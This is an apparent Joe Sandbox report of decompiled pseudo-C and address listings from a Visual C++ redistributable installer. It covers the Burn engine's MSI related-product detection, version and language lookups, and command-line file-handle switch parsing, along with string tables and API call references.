                                                                          																 *(_t311 + 0x1c) = 1;
                                                                          																goto L113;
                                                                          															} else {
                                                                          																_t213 = _t212 - 1;
                                                                          																__eflags = _t213;
                                                                          																if(_t213 == 0) {
                                                                          																	 *(_t311 + 0x1c) = 3;
                                                                          																	goto L113;
                                                                          																} else {
                                                                          																	_t214 = _t213 != 1;
                                                                          																	__eflags = _t213 != 1;
                                                                          																	if(_t213 != 1) {
                                                                          																		_t319 = 0x8000ffff;
                                                                          																		E000B37D3(_t214, "msiengine.cpp", 0x283, 0x8000ffff);
                                                                          																		_push("Invalid state value.");
                                                                          																		goto L119;
                                                                          																	} else {
                                                                          																		 *(_t311 + 0x1c) = _t294;
                                                                          																		L113:
                                                                          																		_t206 =  *((intOrPtr*)(_v108 + 0x10));
                                                                          																		_t319 = E000BD58B(_v108, 1,  *((intOrPtr*)( *_t206 + 0x40))(_t206,  *_t317,  *_t311,  *(_t311 + 0x1c)));
                                                                          																		__eflags = _t319;
                                                                          																		if(_t319 < 0) {
                                                                          																			E000B37D3(_t208, "msiengine.cpp", 0x289, _t319);
                                                                          																			_push("UX aborted detect.");
                                                                          																			goto L119;
                                                                          																		} else {
                                                                          																			goto L114;
                                                                          																		}
                                                                          																	}
                                                                          																}
                                                                          															}
                                                                          														}
                                                                          													}
                                                                          												}
                                                                          												goto L120;
                                                                          												L114:
                                                                          												_t290 = _t290 + 1;
                                                                          												_t203 = _v124 + 0x28;
                                                                          												_v124 = _t203;
                                                                          												__eflags = _t290 -  *(_t317 + 0xc0);
                                                                          											} while (_t290 <  *(_t317 + 0xc0));
                                                                          										}
                                                                          									} else {
                                                                          										_t298 = _t290;
                                                                          										_v128 = _t290;
                                                                          										do {
                                                                          											_t219 =  *((intOrPtr*)(_t317 + 0xc4)) + _t298;
                                                                          											_v148 = _t290;
                                                                          											_t299 =  &_v88;
                                                                          											_v104 = _t219;
                                                                          											_push( &_v88);
                                                                          											_push(_t290);
                                                                          											_push( *_t219);
                                                                          											while(1) {
                                                                          												_t220 = E000F2690(); // executed
                                                                          												_t319 = _t220;
                                                                          												__eflags = _t319 - 0x80070103;
                                                                          												if(_t319 == 0x80070103) {
                                                                          													goto L91;
                                                                          												}
                                                                          												__eflags = _t319;
                                                                          												if(_t319 < 0) {
                                                                          													_push("Failed to enum related products.");
                                                                          													goto L119;
                                                                          												} else {
                                                                          													_t222 = CompareStringW(_t290, 1,  *(_t317 + 0x90), 0xffffffff,  &_v88, 0xffffffff);
                                                                          													__eflags = _t222 - 2;
                                                                          													if(_t222 == 2) {
                                                                          														L88:
                                                                          														_t321 = _v104;
                                                                          														goto L89;
                                                                          													} else {
                                                                          														_t227 = E000F28F8(_t299,  &_v88, _t290, 2, L"VersionString",  &_v92); // executed
                                                                          														_t322 = _t227;
                                                                          														__eflags = _t322 - 0x80070645;
                                                                          														if(_t322 == 0x80070645) {
                                                                          															L43:
                                                                          															_push( &_v92);
                                                                          															_push(L"VersionString");
                                                                          															_t229 = 4;
                                                                          															_push(_t229);
                                                                          															_push(_t290);
                                                                          															_push( &_v88); // executed
                                                                          															_t231 = E000F28F8(_t299); // executed
                                                                          															_t319 = _t231;
                                                                          															__eflags = _t319 - 0x80070645;
                                                                          															if(_t319 == 0x80070645) {
                                                                          																goto L88;
                                                                          															} else {
                                                                          																__eflags = _t319 - 0x80070648;
                                                                          																if(_t319 == 0x80070648) {
                                                                          																	goto L88;
                                                                          																} else {
                                                                          																	__eflags = _t319;
                                                                          																	if(_t319 < 0) {
                                                                          																		_push( &_v88);
                                                                          																		_push("Failed to get version for product in machine context: %ls");
                                                                          																		goto L20;
                                                                          																	} else {
                                                                          																		_v136 = 1;
                                                                          																		goto L47;
                                                                          																	}
                                                                          																}
                                                                          															}
                                                                          														} else {
                                                                          															__eflags = _t322 - 0x80070648;
                                                                          															if(_t322 == 0x80070648) {
                                                                          																goto L43;
                                                                          															} else {
                                                                          																__eflags = _t322;
                                                                          																if(_t322 < 0) {
                                                                          																	_push( &_v88);
                                                                          																	_push("Failed to get version for product in user unmanaged context: %ls");
                                                                          																	L20:
                                                                          																	_push(_t319);
                                                                          																	E000F012F();
                                                                          																} else {
                                                                          																	_v136 = _t290;
                                                                          																	L47:
                                                                          																	_t319 = E000F4B5A(_t311, _v92, _t290,  &_v116);
                                                                          																	__eflags = _t319;
                                                                          																	if(_t319 < 0) {
                                                                          																		_push( &_v88);
                                                                          																		goto L3;
                                                                          																	} else {
                                                                          																		_t321 = _v104;
                                                                          																		_t300 = _v116;
                                                                          																		_t238 = _v112;
                                                                          																		__eflags =  *((intOrPtr*)(_t321 + 0x18)) - _t290;
                                                                          																		if( *((intOrPtr*)(_t321 + 0x18)) == _t290) {
                                                                          																			L57:
                                                                          																			__eflags =  *((intOrPtr*)(_t321 + 0x1c)) - _t290;
                                                                          																			if( *((intOrPtr*)(_t321 + 0x1c)) == _t290) {
                                                                          																				L66:
                                                                          																				_v132 = _t290;
                                                                          																				__eflags =  *((intOrPtr*)(_t321 + 0x34)) - _t290;
                                                                          																				if( *((intOrPtr*)(_t321 + 0x34)) == _t290) {
                                                                          																					L79:
                                                                          																					__eflags =  *((intOrPtr*)(_t321 + 0x28)) - _t290;
                                                                          																					if( *((intOrPtr*)(_t321 + 0x28)) == _t290) {
                                                                          																						_push(3);
                                                                          																						_pop(1);
                                                                          																						goto L86;
                                                                          																					} else {
                                                                          																						__eflags = _v100 - 3;
                                                                          																						if(_v100 == 3) {
                                                                          																							L84:
                                                                          																							_t323 = _t290;
                                                                          																						} else {
                                                                          																							__eflags =  *(_t317 + 0x40) - 2;
                                                                          																							if( *(_t317 + 0x40) != 2) {
                                                                          																								goto L84;
                                                                          																							} else {
                                                                          																								 *(_t317 + 0x40) = 1;
                                                                          																								L86:
                                                                          																								_v100 = 1;
                                                                          																								_t323 = 1;
                                                                          																							}
                                                                          																						}
                                                                          																					}
                                                                          																					E000B550F(2, 0x20000067,  &_v88); // executed
                                                                          																					_t329 = _t329 + 0x1c;
                                                                          																					_t246 =  *((intOrPtr*)(_v108 + 0x10));
                                                                          																					_t311 =  &_v88;
                                                                          																					_t319 = E000BD58B(_v108, 1,  *((intOrPtr*)( *_t246 + 0x38))(_t246,  *_t317,  &_v88, _v136, _v116, _v112, _t323, E000C40EF(_v136), E000C43FA(_v116, _v112), _v132, E000C4107(_t323)));
                                                                          																					__eflags = _t319;
                                                                          																					if(_t319 < 0) {
                                                                          																						_push(_t319);
                                                                          																						_push(0x257);
                                                                          																						goto L16;
                                                                          																					} else {
                                                                          																						goto L88;
                                                                          																					}
                                                                          																				} else {
                                                                          																					_t311 = _v136;
                                                                          																					__eflags = E000F28F8(_t300,  &_v88, _t290, 2 + _v136 * 2, L"Language",  &_v120);
                                                                          																					if(__eflags < 0) {
                                                                          																						L83:
                                                                          																						E000F00CF(_t311, __eflags, _t254, 0xe0000098, _t290,  &_v88, _v120, _t290);
                                                                          																						goto L89;
                                                                          																					} else {
                                                                          																						__eflags = E000B29DC(_t300, _t311, _v120, _t290,  &_v132);
                                                                          																						if(__eflags < 0) {
                                                                          																							goto L83;
                                                                          																						} else {
                                                                          																							_t303 = _t290;
                                                                          																							_t311 = _t290;
                                                                          																							__eflags =  *((intOrPtr*)(_t321 + 0x34)) - _t303;
                                                                          																							if( *((intOrPtr*)(_t321 + 0x34)) > _t303) {
                                                                          																								_t258 =  *((intOrPtr*)(_t321 + 0x30));
                                                                          																								while(1) {
                                                                          																									__eflags = _v132 -  *_t258;
                                                                          																									_t321 = _v104;
                                                                          																									if(_v132 ==  *_t258) {
                                                                          																										break;
                                                                          																									}
                                                                          																									_t303 = _t303 + 1;
                                                                          																									_t258 = _t258 + 4;
                                                                          																									__eflags = _t303 -  *((intOrPtr*)(_t321 + 0x34));
                                                                          																									if(_t303 <  *((intOrPtr*)(_t321 + 0x34))) {
                                                                          																										continue;
                                                                          																									} else {
                                                                          																									}
                                                                          																									goto L75;
                                                                          																								}
                                                                          																								_t311 = 1;
                                                                          																								__eflags = 1;
                                                                          																							}
                                                                          																							L75:
                                                                          																							_t257 =  *(_t321 + 0x2c);
                                                                          																							__eflags = _t257;
                                                                          																							if(_t257 == 0) {
                                                                          																								L78:
                                                                          																								__eflags = _t311;
                                                                          																								if(_t311 != 0) {
                                                                          																									goto L89;
                                                                          																								} else {
                                                                          																									goto L79;
                                                                          																								}
                                                                          																							} else {
                                                                          																								__eflags = _t311;
                                                                          																								if(_t311 == 0) {
                                                                          																									goto L89;
                                                                          																								} else {
                                                                          																									__eflags = _t257;
                                                                          																									if(_t257 != 0) {
                                                                          																										goto L79;
                                                                          																									} else {
                                                                          																										goto L78;
                                                                          																									}
                                                                          																								}
                                                                          																							}
                                                                          																						}
                                                                          																					}
                                                                          																				}
                                                                          																			} else {
                                                                          																				__eflags =  *((intOrPtr*)(_t321 + 0x24)) - _t290;
                                                                          																				if( *((intOrPtr*)(_t321 + 0x24)) == _t290) {
                                                                          																					__eflags = _t238 -  *((intOrPtr*)(_t321 + 0x14));
                                                                          																					if(__eflags > 0) {
                                                                          																						goto L89;
                                                                          																					} else {
                                                                          																						if(__eflags < 0) {
                                                                          																							goto L66;
                                                                          																						} else {
                                                                          																							__eflags = _t300 -  *((intOrPtr*)(_t321 + 0x10));
                                                                          																							if(_t300 >=  *((intOrPtr*)(_t321 + 0x10))) {
                                                                          																								goto L89;
                                                                          																							} else {
                                                                          																								goto L66;
                                                                          																							}
                                                                          																						}
                                                                          																					}
                                                                          																				} else {
                                                                          																					__eflags = _t238 -  *((intOrPtr*)(_t321 + 0x14));
                                                                          																					if(__eflags > 0) {
                                                                          																						goto L89;
                                                                          																					} else {
                                                                          																						if(__eflags < 0) {
                                                                          																							goto L66;
                                                                          																						} else {
                                                                          																							__eflags = _t300 -  *((intOrPtr*)(_t321 + 0x10));
                                                                          																							if(_t300 >  *((intOrPtr*)(_t321 + 0x10))) {
                                                                          																								goto L89;
                                                                          																							} else {
                                                                          																								goto L66;
                                                                          																							}
                                                                          																						}
                                                                          																					}
                                                                          																				}
                                                                          																			}
                                                                          																		} else {
                                                                          																			__eflags =  *((intOrPtr*)(_t321 + 0x20)) - _t290;
                                                                          																			if( *((intOrPtr*)(_t321 + 0x20)) == _t290) {
                                                                          																				__eflags = _t238 -  *((intOrPtr*)(_t321 + 0xc));
                                                                          																				if(__eflags < 0) {
                                                                          																					goto L89;
                                                                          																				} else {
                                                                          																					if(__eflags > 0) {
                                                                          																						goto L57;
                                                                          																					} else {
                                                                          																						__eflags = _t300 -  *((intOrPtr*)(_t321 + 8));
                                                                          																						if(_t300 <=  *((intOrPtr*)(_t321 + 8))) {
                                                                          																							goto L89;
                                                                          																						} else {
                                                                          																							goto L57;
                                                                          																						}
                                                                          																					}
                                                                          																				}
                                                                          																			} else {
                                                                          																				__eflags = _t238 -  *((intOrPtr*)(_t321 + 0xc));
                                                                          																				if(__eflags < 0) {
                                                                          																					L89:
                                                                          																					_t299 =  &_v88;
                                                                          																					_t224 = _v148 + 1;
                                                                          																					__eflags = _t224;
                                                                          																					_push( &_v88);
                                                                          																					_push(_t224);
                                                                          																					_push( *_t321);
                                                                          																					_v148 = _t224;
                                                                          																					continue;
                                                                          																				} else {
                                                                          																					if(__eflags > 0) {
                                                                          																						goto L57;
                                                                          																					} else {
                                                                          																						__eflags = _t300 -  *((intOrPtr*)(_t321 + 8));
                                                                          																						if(_t300 <  *((intOrPtr*)(_t321 + 8))) {
                                                                          																							goto L89;
                                                                          																						} else {
                                                                          																							goto L57;
                                                                          																						}
                                                                          																					}
                                                                          																				}
                                                                          																			}
                                                                          																		}
                                                                          																	}
                                                                          																}
                                                                          															}
                                                                          														}
                                                                          													}
                                                                          												}
                                                                          												goto L120;
                                                                          											}
                                                                          											L91:
                                                                          											_t319 = _t290;
                                                                          											_t261 = _v124 + 1;
                                                                          											_t298 = _v128 + 0x38;
                                                                          											_v124 = _t261;
                                                                          											_v128 = _t298;
                                                                          											__eflags = _t261 -  *((intOrPtr*)(_t317 + 0xc8));
                                                                          										} while (_t261 <  *((intOrPtr*)(_t317 + 0xc8)));
                                                                          										goto L92;
                                                                          									}
                                                                          								} else {
                                                                          									_push(_t319);
                                                                          									_push(0x1af);
                                                                          									L16:
                                                                          									_push("msiengine.cpp");
                                                                          									E000B37D3(_t248);
                                                                          									_push("UX aborted detect related MSI package.");
                                                                          									L119:
                                                                          									_push(_t319);
                                                                          									E000F012F();
                                                                          								}
                                                                          							} else {
                                                                          								__eflags = _t311 - _t307;
                                                                          								if(_t311 >= _t307) {
                                                                          									goto L8;
                                                                          								} else {
                                                                          									goto L7;
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          					} else {
                                                                          						_push( *(_t317 + 0x90));
                                                                          						L3:
                                                                          						E000F012F(_t319, "Failed to convert version: %ls to DWORD64 for ProductCode: %ls", _v92);
                                                                          					}
                                                                          				}
                                                                          				L120:
                                                                          				if(_v144 != 0) {
                                                                          					E000F54EF(_v144);
                                                                          				}
                                                                          				if(_v96 != 0) {
                                                                          					E000F54EF(_v96);
                                                                          				}
                                                                          				if(_v120 != 0) {
                                                                          					E000F54EF(_v120);
                                                                          				}
                                                                          				if(_v92 != 0) {
                                                                          					E000F54EF(_v92);
                                                                          				}
                                                                          				return E000DDE36(_t290, _v8 ^ _t327, _t311, _t317, _t319);
                                                                          			}

                                                                          0x000d3e79
                                                                          0x000d3e56
                                                                          0x00000000
                                                                          0x000d3f13
                                                                          0x000d3f16
                                                                          0x000d3f17
                                                                          0x000d3f1a
                                                                          0x000d3f1d
                                                                          0x000d3f1d
                                                                          0x000d3f29
                                                                          0x000d3b5e
                                                                          0x000d3b5e
                                                                          0x000d3b60
                                                                          0x000d3b63
                                                                          0x000d3b69
                                                                          0x000d3b6b
                                                                          0x000d3b71
                                                                          0x000d3b74
                                                                          0x000d3b77
                                                                          0x000d3b78
                                                                          0x000d3b79
                                                                          0x000d3de3
                                                                          0x000d3de3
                                                                          0x000d3de8
                                                                          0x000d3dea
                                                                          0x000d3df0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000d3b80
                                                                          0x000d3b82
                                                                          0x000d3ec3
                                                                          0x00000000
                                                                          0x000d3b88
                                                                          0x000d3b99
                                                                          0x000d3b9f
                                                                          0x000d3ba2
                                                                          0x000d3dcc
                                                                          0x000d3dcc
                                                                          0x00000000
                                                                          0x000d3ba8
                                                                          0x000d3bb8
                                                                          0x000d3bbd
                                                                          0x000d3bbf
                                                                          0x000d3bc5
                                                                          0x000d3bdf
                                                                          0x000d3be2
                                                                          0x000d3be3
                                                                          0x000d3bea
                                                                          0x000d3beb
                                                                          0x000d3bec
                                                                          0x000d3bf0
                                                                          0x000d3bf1
                                                                          0x000d3bf6
                                                                          0x000d3bf8
                                                                          0x000d3bfe
                                                                          0x00000000
                                                                          0x000d3c04
                                                                          0x000d3c04
                                                                          0x000d3c0a
                                                                          0x00000000
                                                                          0x000d3c10
                                                                          0x000d3c10
                                                                          0x000d3c12
                                                                          0x000d3eb8
                                                                          0x000d3eb9
                                                                          0x00000000
                                                                          0x000d3c18
                                                                          0x000d3c18
                                                                          0x00000000
                                                                          0x000d3c18
                                                                          0x000d3c12
                                                                          0x000d3c0a
                                                                          0x000d3bc7
                                                                          0x000d3bc7
                                                                          0x000d3bcd
                                                                          0x00000000
                                                                          0x000d3bcf
                                                                          0x000d3bcf
                                                                          0x000d3bd1
                                                                          0x000d3e96
                                                                          0x000d3e97
                                                                          0x000d3a24
                                                                          0x000d3a24
                                                                          0x000d3a25
                                                                          0x000d3bd7
                                                                          0x000d3bd7
                                                                          0x000d3c22
                                                                          0x000d3c2f
                                                                          0x000d3c31
                                                                          0x000d3c33
                                                                          0x000d3eaf
                                                                          0x00000000
                                                                          0x000d3c39
                                                                          0x000d3c39
                                                                          0x000d3c3c
                                                                          0x000d3c3f
                                                                          0x000d3c42
                                                                          0x000d3c45
                                                                          0x000d3c76
                                                                          0x000d3c76
                                                                          0x000d3c79
                                                                          0x000d3caa
                                                                          0x000d3caa
                                                                          0x000d3cad
                                                                          0x000d3cb0
                                                                          0x000d3d27
                                                                          0x000d3d27
                                                                          0x000d3d2a
                                                                          0x000d3d5a
                                                                          0x000d3d5c
                                                                          0x00000000
                                                                          0x000d3d2c
                                                                          0x000d3d2c
                                                                          0x000d3d30
                                                                          0x000d3d56
                                                                          0x000d3d56
                                                                          0x000d3d32
                                                                          0x000d3d32
                                                                          0x000d3d36
                                                                          0x00000000
                                                                          0x000d3d38
                                                                          0x000d3d3b
                                                                          0x000d3d5d
                                                                          0x000d3d5d
                                                                          0x000d3d60
                                                                          0x000d3d60
                                                                          0x000d3d36
                                                                          0x000d3d30
                                                                          0x000d3d8f
                                                                          0x000d3d97
                                                                          0x000d3da0
                                                                          0x000d3dad
                                                                          0x000d3dc2
                                                                          0x000d3dc4
                                                                          0x000d3dc6
                                                                          0x000d3ea1
                                                                          0x000d3ea2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000d3cb2
                                                                          0x000d3cb2
                                                                          0x000d3cd3
                                                                          0x000d3cd5
                                                                          0x000d3d40
                                                                          0x000d3d4f
                                                                          0x00000000
                                                                          0x000d3cd7
                                                                          0x000d3ce4
                                                                          0x000d3ce6
                                                                          0x00000000
                                                                          0x000d3ce8
                                                                          0x000d3ce8
                                                                          0x000d3cea
                                                                          0x000d3cec
                                                                          0x000d3cef
                                                                          0x000d3cf1
                                                                          0x000d3cf4
                                                                          0x000d3cf7
                                                                          0x000d3cf9
                                                                          0x000d3cfc
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000d3cfe
                                                                          0x000d3cff
                                                                          0x000d3d02
                                                                          0x000d3d05
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000d3d07
                                                                          0x00000000
                                                                          0x000d3d05
                                                                          0x000d3d0b
                                                                          0x000d3d0b
                                                                          0x000d3d0b
                                                                          0x000d3d0c
                                                                          0x000d3d0c
                                                                          0x000d3d0f
                                                                          0x000d3d11
                                                                          0x000d3d1f
                                                                          0x000d3d1f
                                                                          0x000d3d21
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000d3d13
                                                                          0x000d3d13
                                                                          0x000d3d15
                                                                          0x00000000
                                                                          0x000d3d1b
                                                                          0x000d3d1b
                                                                          0x000d3d1d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000d3d1d
                                                                          0x000d3d15
                                                                          0x000d3d11
                                                                          0x000d3ce6
                                                                          0x000d3cd5
                                                                          0x000d3c7b
                                                                          0x000d3c7b
                                                                          0x000d3c7e
                                                                          0x000d3c96
                                                                          0x000d3c99
                                                                          0x00000000
                                                                          0x000d3c9f
                                                                          0x000d3c9f
                                                                          0x00000000
                                                                          0x000d3ca1
                                                                          0x000d3ca1
                                                                          0x000d3ca4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000d3ca4
                                                                          0x000d3c9f
                                                                          0x000d3c80
                                                                          0x000d3c80
                                                                          0x000d3c83
                                                                          0x00000000
                                                                          0x000d3c89
                                                                          0x000d3c89
                                                                          0x00000000
                                                                          0x000d3c8b
                                                                          0x000d3c8b
                                                                          0x000d3c8e
                                                                          0x00000000
                                                                          0x000d3c94
                                                                          0x00000000
                                                                          0x000d3c94
                                                                          0x000d3c8e
                                                                          0x000d3c89
                                                                          0x000d3c83
                                                                          0x000d3c7e
                                                                          0x000d3c47
                                                                          0x000d3c47
                                                                          0x000d3c4a
                                                                          0x000d3c62
                                                                          0x000d3c65
                                                                          0x00000000
                                                                          0x000d3c6b
                                                                          0x000d3c6b
                                                                          0x00000000
                                                                          0x000d3c6d
                                                                          0x000d3c6d
                                                                          0x000d3c70
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000d3c70
                                                                          0x000d3c6b
                                                                          0x000d3c4c
                                                                          0x000d3c4c
                                                                          0x000d3c4f
                                                                          0x000d3dcf
                                                                          0x000d3dd5
                                                                          0x000d3dd8
                                                                          0x000d3dd8
                                                                          0x000d3dd9
                                                                          0x000d3dda
                                                                          0x000d3ddb
                                                                          0x000d3ddd
                                                                          0x00000000
                                                                          0x000d3c55
                                                                          0x000d3c55
                                                                          0x00000000
                                                                          0x000d3c57
                                                                          0x000d3c57
                                                                          0x000d3c5a
                                                                          0x00000000
                                                                          0x000d3c60
                                                                          0x00000000
                                                                          0x000d3c60
                                                                          0x000d3c5a
                                                                          0x000d3c55
                                                                          0x000d3c4f
                                                                          0x000d3c4a
                                                                          0x000d3c45
                                                                          0x000d3c33
                                                                          0x000d3bd1
                                                                          0x000d3bcd
                                                                          0x000d3bc5
                                                                          0x000d3ba2
                                                                          0x00000000
                                                                          0x000d3b82
                                                                          0x000d3df6
                                                                          0x000d3df9
                                                                          0x000d3dfe
                                                                          0x000d3dff
                                                                          0x000d3e02
                                                                          0x000d3e05
                                                                          0x000d3e08
                                                                          0x000d3e08
                                                                          0x00000000
                                                                          0x000d3b63
                                                                          0x000d39ef
                                                                          0x000d39ef
                                                                          0x000d39f0
                                                                          0x000d39f5
                                                                          0x000d39f5
                                                                          0x000d39fa
                                                                          0x000d39ff
                                                                          0x000d3f63
                                                                          0x000d3f63
                                                                          0x000d3f64
                                                                          0x000d3f6a
                                                                          0x000d393d
                                                                          0x000d393d
                                                                          0x000d393f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000d393f
                                                                          0x000d393b
                                                                          0x000d3906
                                                                          0x000d3906
                                                                          0x000d390c
                                                                          0x000d3915
                                                                          0x000d391a
                                                                          0x000d3904
                                                                          0x000d3f6b
                                                                          0x000d3f72
                                                                          0x000d3f7a
                                                                          0x000d3f7a
                                                                          0x000d3f83
                                                                          0x000d3f88
                                                                          0x000d3f88
                                                                          0x000d3f91
                                                                          0x000d3f96
                                                                          0x000d3f96
                                                                          0x000d3f9f
                                                                          0x000d3fa4
                                                                          0x000d3fa4
                                                                          0x000d3fbb

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen
                                                                          • String ID: Failed to convert version: %ls to DWORD64 for ProductCode: %ls$Failed to copy the installed ProductCode to the package.$Failed to enum related products.$Failed to get product information for ProductCode: %ls$Failed to get version for product in machine context: %ls$Failed to get version for product in user unmanaged context: %ls$Failed to query feature state.$Invalid state value.$Language$UX aborted detect compatible MSI package.$UX aborted detect related MSI package.$UX aborted detect.$VersionString$msasn1.dll$msiuser.cpp
                                                                          • API String ID: 1659193697-2574767977
                                                                          • Opcode ID: 9bdd98bebc52c0bd7caf342f36e201f23b9788bf90ba70689ed51251b40db33b
                                                                          • Instruction ID: c3bba37a6198fdbe16e3e320d326d0dedea8c8f422ee38f304b5390b138a5ece
                                                                          • Opcode Fuzzy Hash: 9bdd98bebc52c0bd7caf342f36e201f23b9788bf90ba70689ed51251b40db33b
                                                                          • Instruction Fuzzy Hash: FE227F71A00719AFDB249FA4CC85FADB7B9FF04710F10412AE605AB292D771AE50DF62
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 66%
                                                                          			E000B41D2(void* __ecx, union _LARGE_INTEGER* __edx, void* __eflags, struct _CRITICAL_SECTION* _a4, signed int _a8) {
                                                                          				char _v8;
                                                                          				void* _t50;
                                                                          				int _t55;
                                                                          				WCHAR* _t56;
                                                                          				int _t62;
                                                                          				WCHAR* _t63;
                                                                          				signed int _t69;
                                                                          				intOrPtr* _t72;
                                                                          				signed int _t76;
                                                                          				struct _CRITICAL_SECTION* _t79;
                                                                          				signed int _t83;
                                                                          				void* _t89;
                                                                          				void* _t93;
                                                                          				union _LARGE_INTEGER* _t96;
                                                                          				struct _CRITICAL_SECTION* _t98;
                                                                          				void* _t100;
                                                                          				void* _t103;
                                                                          
                                                                          				_t96 = __edx;
                                                                          				_push(__ecx);
                                                                          				_a8 = _a8 | 0xffffffff;
                                                                          				_t98 = _a4;
                                                                          				_v8 = _a8;
                                                                          				 *(_t98 + 0x498) =  *(_t98 + 0x498) | 0xffffffff;
                                                                          				 *(_t98 + 0x494) = 1;
                                                                          				InitializeCriticalSection(_t98);
                                                                          				_t9 = _t98 + 0xd0; // 0xd0
                                                                          				InitializeCriticalSection(_t9);
                                                                          				_t10 = _t98 + 0x4a0; // 0x4a0
                                                                          				E000C4B0E(_t10);
                                                                          				_t11 = _t98 + 0x4b8; // 0x4b8
                                                                          				E000C4B0E(_t11);
                                                                          				_t83 = 0;
                                                                          				if( *((intOrPtr*)(_t98 + 0x4dc)) <= 0) {
                                                                          					L14:
                                                                          					_t40 = _t98 + 0x48; // 0x48
                                                                          					_t50 = E000BB389(_t96, _t40, _v8, _a8); // executed
                                                                          					_t103 = _t50;
                                                                          					if(_t103 < 0) {
                                                                          						_push("Failed to initialize engine section.");
                                                                          						_push(_t103);
                                                                          						E000F012F();
                                                                          					}
                                                                          					L16:
                                                                          					return _t103;
                                                                          				}
                                                                          				do {
                                                                          					if( *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t98 + 0x4e0)) + _t83 * 4)))) != 0x2d) {
                                                                          						goto L13;
                                                                          					}
                                                                          					_t55 = lstrlenW(L"burn.filehandle.attached");
                                                                          					_t56 = L"burn.filehandle.attached";
                                                                          					if(CompareStringW(0x7f, 1,  *((intOrPtr*)( *((intOrPtr*)(_t98 + 0x4e0)) + _t83 * 4)) + 2, lstrlenW(_t56), _t56, _t55) != 2) {
                                                                          						L8:
                                                                          						_t62 = lstrlenW(L"burn.filehandle.self");
                                                                          						_t63 = L"burn.filehandle.self";
                                                                          						if(CompareStringW(0x7f, 1,  *((intOrPtr*)( *((intOrPtr*)(_t98 + 0x4e0)) + _t83 * 4)) + 2, lstrlenW(_t63), _t63, _t62) != 2) {
                                                                          							goto L13;
                                                                          						}
                                                                          						_t69 = lstrlenW(L"burn.filehandle.self");
                                                                          						_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t98 + 0x4e0)) + _t83 * 4)) + 4 + _t69 * 2;
                                                                          						_t89 = 0x3d;
                                                                          						_a4 = _t72;
                                                                          						if(_t89 !=  *((intOrPtr*)(_t72 - 2)) || 0 ==  *_t72) {
                                                                          							_t100 = 0x80070057;
                                                                          							E000B37D3(_t72, "engine.cpp", 0x140, 0x80070057);
                                                                          							_push(L"burn.filehandle.self");
                                                                          							L19:
                                                                          							_push("Missing required parameter for switch: %ls");
                                                                          							_t103 = _t100;
                                                                          							_push(_t100);
                                                                          							goto L20;
                                                                          						} else {
                                                                          							_t103 = E000B29DC( &_v8, _t96, _t72, 0,  &_v8);
                                                                          							if(_t103 < 0) {
                                                                          								L17:
                                                                          								_push(_a4);
                                                                          								_push("Failed to parse file handle: \'%ls\'");
                                                                          								_push(_t103);
                                                                          								L20:
                                                                          								E000F012F();
                                                                          								goto L16;
                                                                          							}
                                                                          							goto L13;
                                                                          						}
                                                                          					}
                                                                          					_t76 = lstrlenW(L"burn.filehandle.attached");
                                                                          					_t79 =  *((intOrPtr*)( *((intOrPtr*)(_t98 + 0x4e0)) + _t83 * 4)) + 4 + _t76 * 2;
                                                                          					_t93 = 0x3d;
                                                                          					_a4 = _t79;
                                                                          					if(_t93 !=  *((intOrPtr*)(_t79 - 2)) || 0 ==  *_t79) {
                                                                          						_t100 = 0x80070057;
                                                                          						E000B37D3(_t79, "engine.cpp", 0x135, 0x80070057);
                                                                          						_push(L"burn.filehandle.attached");
                                                                          						goto L19;
                                                                          					} else {
                                                                          						_t103 = E000B29DC( &_a8, _t96, _t79, 0,  &_a8);
                                                                          						if(_t103 < 0) {
                                                                          							goto L17;
                                                                          						}
                                                                          						goto L8;
                                                                          					}
                                                                          					L13:
                                                                          					_t83 = _t83 + 1;
                                                                          				} while (_t83 <  *((intOrPtr*)(_t98 + 0x4dc)));
                                                                          				goto L14;
                                                                          			}





















                                                                          APIs
                                                                          • InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,000B515E,?,?,00000000,?,?), ref: 000B41FE
                                                                          • InitializeCriticalSection.KERNEL32(000000D0,?,?,000B515E,?,?,00000000,?,?), ref: 000B4207
                                                                          • lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,000B515E,?,?,00000000,?,?), ref: 000B424D
                                                                          • lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,000B515E,?,?,00000000,?,?), ref: 000B4257
                                                                          • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,000B515E,?,?,00000000,?,?), ref: 000B426B
                                                                          • lstrlenW.KERNEL32(burn.filehandle.attached,?,?,000B515E,?,?,00000000,?,?), ref: 000B427B
                                                                          • lstrlenW.KERNEL32(burn.filehandle.self,?,?,000B515E,?,?,00000000,?,?), ref: 000B42CB
